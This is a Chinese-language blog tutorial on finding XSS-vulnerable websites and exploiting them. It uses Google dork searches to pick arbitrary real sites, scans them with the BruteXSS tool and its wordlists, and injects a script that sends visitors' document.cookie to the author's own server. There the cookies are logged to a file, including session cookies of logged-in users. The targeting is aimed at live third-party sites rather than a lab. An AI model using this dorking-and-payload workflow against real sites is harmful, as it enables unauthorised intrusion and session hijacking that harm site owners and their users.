您的位置:首页 > 运维架构 > 网站架构

寻找xss漏洞网站并利用

2017-08-18 10:00 344 查看
工具:brutexss (可以找我要,或百度)

谷歌搜 inurl:'Product.asp?BigClassName 或其他

随便点进一个网站



CMD进入brutexss工具包(需要Python2.7环境)

brutexss包里面下面4个txt 是字典,运行cmd 运行 brutexss.py





选择方式可以选择get 或者 post,这次选择G,如果是Post也可以选择P

然后输入刚刚需要监测的网站 



确定后,选择字典,直接按Enter使用默认 的 wordlist.txt 



wordlist.txt 
  # 约20条常用语句,可以执行一个基本简单的XSS检查

wordlist-small.txt 
   #约100条语句,可以执行一个相对全面的XSS检查

wordlist-medium.txt 
   #约200条语句,可以执行一个绕过WAF的XSS检查

wordlist-huge.tx 
  #约5000条语句,可以执行一个非常全面的并且绕过WAF的XSS检查

扫描出存在xss漏洞



在网站加入JS代码试试



发现可以运行



寻找XSS漏洞基本流程完毕,接下来利用xss漏洞获得cookie,传到我们自己服务器

把script标签里面内容改成: 

<script>var aa=document.cookie;var bb=document.getElementsByTagName("a")[0];bb.setAttribute("href","xxxxxxxxxx/test2.php?aa="%2Baa)</script>

(获取aa变量 为 cookie;bb变量为第一个a标签,然后设置第一个a标签的href值为自己服务器的test2.php文件,%2B 是 + 号 的转义)

也可以改成别的,这里面的东西可以好好研究,可以研究出好多好玩的。

然后查看代码 ,已经把a元素 的href标签改成功



然后服务器 test2.php 接收,把接收数据放到test.txt 下



点击改成功的连接后,去服务器test.txt查看数据



成功接收了 cookie 信息,如果登录了,会获得登录了的cookie 信息。

本文章这里结束了,知道自己还是个菜鸟,求共同进步。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  xss 漏洞